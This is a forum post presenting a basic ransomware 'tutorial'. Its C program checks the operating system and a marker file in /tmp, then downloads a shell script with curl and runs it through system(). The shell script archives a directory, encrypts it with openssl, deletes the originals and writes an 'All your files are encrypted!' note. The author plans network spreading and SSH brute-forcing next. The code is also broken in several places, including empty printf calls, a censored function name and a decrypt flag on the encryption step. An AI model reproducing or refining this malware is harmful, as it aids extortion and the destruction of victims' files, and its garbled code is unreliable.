- ransomware.jpg (54.57 KiB) Viewed 14082 times
Ransomware is a form of malware from cryptovirology that threatens to permanently block access to victims' personal data without publishing it or paying a ransom.
Although some simple ransomware can lock the system without damaging any file, the most advanced malware uses a technique called crypto viral extraction.
This version is very basic. The next one will be able to spread throughout a network, and also use a dictionary attack or brute-force ssh logins. More experienced malware coders please take a look and critique the code, I’d appreciate it.
The first part of the malware includes a few essential libraries. Next, it checks to see if the OS is macOS, Linux, or Windows. If it’s windows the program should fail immediately. The next version of this program will work on windows.
Code: Select all
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
/*checks OS, fails if windows*/
void os_check(){
#ifdef _WIN32
exit(1)
#elif __APPLE__
printf();
#elif __LINUX__
printf();
#endif
}
This next section checks to see if the host has already been infected. If so it fails automatically. Of course this to make sure the program doesn’t try infect a system it’s already compromised. Next, we create a pointer called *command. Then memory is allocated for it. Afterwards we pass a string to str*****y, which passes this to command. The command is then run by the system call, system(). If there’s a better way to do this please let me know. The commands are to download a shell script which encrypts the user’s file or directory using aes256.
There’s several other features I wanted to add however I need to read up on implementing them.
Code: Select all
int infected(const char *filename){
filename = "/tmp/worm.c";
struct stat buffer;
int exist = stat(filename,&buffer);
if(exist == 0)
exit(1);
else
return 0;
}
int main(void){
char *command = malloc(60 * sizeof(char));
str*****y(command, "cd /tmp && curl https://0.0.0.0:8000/encrypt.sh");
system(command);
str*****y(command, "./encrypt.sh");
}
Shell script
Code: Select all
#compresses file using tar, encrypts with openssl using aes256 encryption
if [ $1!=$1 ]
then
cd /tmp/test #use whatever directory
tar -czvf test.tar.gz test
openssl aes256 -salt -in test.tar.gz -out test.aes256 -d -pass pass:#password
rm test.tar.gz
rm -r test
echo "All your files are encrypted!" > note.txt
fi
Hope You guys liked this tutorial.
Saying this again that its not my tutorial or method.
I got this from one of my resources and shared with you guyz.
And as you guys know that.
